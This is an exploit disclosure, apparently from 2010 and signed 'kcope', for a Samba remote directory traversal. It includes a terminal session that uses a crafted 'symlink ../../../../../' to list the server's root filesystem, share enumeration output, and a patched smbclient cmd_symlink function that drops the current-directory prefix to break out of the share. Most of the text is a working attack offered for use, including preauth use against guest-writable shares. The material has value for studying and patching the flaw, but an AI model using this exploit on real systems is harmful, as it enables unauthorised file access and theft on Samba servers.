Samba Remote Zero-Day Exploit Feb

http://www.youtube.com/watch?v=NN50RtZ2N74

Samba Remote Directory Traversal
logic fuckup discovered & exploited by Kingcope in 2010

It seems there was a quite similar bug found back in 2004:
http://marc.info/?l=bugtraq&m=109658688505723&w=2

A remote attacker can read, list and retrieve nearly all files on the System remotely.
Required is a valid samba account for a share which is writeable OR
a writeable share which is configured to be a guest account share,
in this case this is a preauth exploit.

The attacker can write for example into /tmp or where the account
he is connecting with has access to (/home/<user> etc).

Exploit session (using the patched smbclient exploit):

smb is a samba user created.

root@nr-pentest:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -Usmb //<host>/testmount/
Enter smb's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
smb: /> ls
. D 0 Wed Feb 3 14:27:03 2010
.. D 0 Wed Feb 3 14:19:13 2010
test D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010

45503 blocks of size 2097152. 24437 blocks available
smb: /> symlink ../../../../../ foobar
smb: /> ls
. D 0 Wed Feb 3 14:27:47 2010
.. D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010
foobar D 0 Mon Feb 1 20:29:12 2010

45503 blocks of size 2097152. 24437 blocks available
smb: /> ls ..
NT_STATUS_OBJECT_PATH_SYNTAX_BAD listing /..

45503 blocks of size 2097152. 24437 blocks available
smb: /> cd foobar
smb: /foobar/> ls
. D 0 Mon Feb 1 20:29:12 2010
.. D 0 Mon Feb 1 20:29:12 2010
initrd.img.old 7646184 Mon Jan 18 13:15:48 2010
boot.ini 18832 Mon Feb 1 20:29:12 2010
home D 0 Mon Jan 18 13:08:24 2010
initrd.img 8007195 Thu Jan 21 21:51:26 2010
.cache DH 0 Sat Jan 23 14:19:08 2010
opt D 0 Sat Jan 30 11:39:59 2010
lib D 0 Thu Jan 21 21:13:01 2010
usr D 0 Sun Jan 31 22:08:11 2010
.libs DH 0 Thu Jan 21 12:30:48 2010
var D 0 Sun Jan 31 21:14:42 2010
bin D 0 Mon Jan 18 13:31:14 2010
selinux D 0 Tue Oct 20 01:05:22 2009
root D 0 Tue Feb 2 19:43:59 2010
vmlinuz.old 3890400 Fri Oct 16 20:03:49 2009
vmlinuz 3890560 Thu Dec 10 20:33:26 2009
etc D 0 Wed Feb 3 14:17:29 2010
srv D 0 Sat Jan 23 20:17:29 2010
proc DR 0 Wed Feb 3 14:10:41 2010
dev D 0 Wed Feb 3 14:11:02 2010
boot D 0 Thu Jan 21 21:51:26 2010
mnt D 0 Sat Jan 23 19:26:23 2010
media D 0 Fri Jan 29 08:32:31 2010
cdrom D 0 Mon Jan 18 12:40:11 2010
tmp D 0 Wed Feb 3 14:26:20 2010
sbin D 0 Thu Jan 21 21:50:58 2010
lost+found D 0 Mon Jan 18 12:39:57 2010
sys D 0 Wed Feb 3 14:10:41 2010

45503 blocks of size 2097152. 24437 blocks available
smb: /foobar/>

put and get works in the folder now!

list open shares, this is normal operation mode not an exploit:

root@nr-pentest:~/Downloads/samba-3.4.5/source3/client# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -L //<host>/
Enter root's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

Sharename Type Comment
--------- ---- -------
testmount Disk // < this share is writable and exploitable!!
print$ Disk Printer Drivers
IPC$ IPC IPC Service (nr-pentest server (Samba, Ubuntu))
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

Server Comment
--------- -------
NR-PENTEST nr-pentest server (Samba, Ubuntu)

Workgroup Master
--------- -------
WORKGROUP NR-PENTEST

smbclient patch (exploit):

samba-3.4.5/source3/client/client.c
/***********************************************************************
*****
UNIX symlink.
************************************************************************
****/

static int cmd_symlink(void)
{
TALLOC_CTX *ctx = talloc_tos();
char *oldname = NULL;
char *newname = NULL;
char *buf = NULL;
char *buf2 = NULL;
char *targetname = NULL;
struct cli_state *targetcli;

if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||
!next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {
d_printf("symlink <oldname> <newname>/n");
return 1;
}
oldname = talloc_asprintf(ctx,
"%s", // << HERE modified
buf);
if (!oldname) {
return 1;
}
newname = talloc_asprintf(ctx,
"%s", // << HERE modified
buf2);
if (!newname) {
return 1;
}
/* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
oldname = talloc_asprintf(ctx,
"%s%s", // < modified (see above)
client_get_cur_dir(), // < removed (see above)
buf);
if (!oldname) {
return 1;
}
newname = talloc_asprintf(ctx,
"%s%s", // < modified (see above)
client_get_cur_dir(), // < removed (see above)
buf2);
if (!newname) {
return 1;
}
----------------------------------------------*/

if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {
d_printf("link %s: %s/n", oldname, cli_errstr(cli));
return 1;

}

if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
d_printf("Server doesn't support UNIX CIFS calls./n");
return 1;
}

if (!cli_unix_symlink(targetcli, targetname, newname)) {
d_printf("%s symlinking files (%s -> %s)/n",
cli_errstr(targetcli), newname, targetname);
return 1;
}

return 0;
}

// Cheers,
// kcope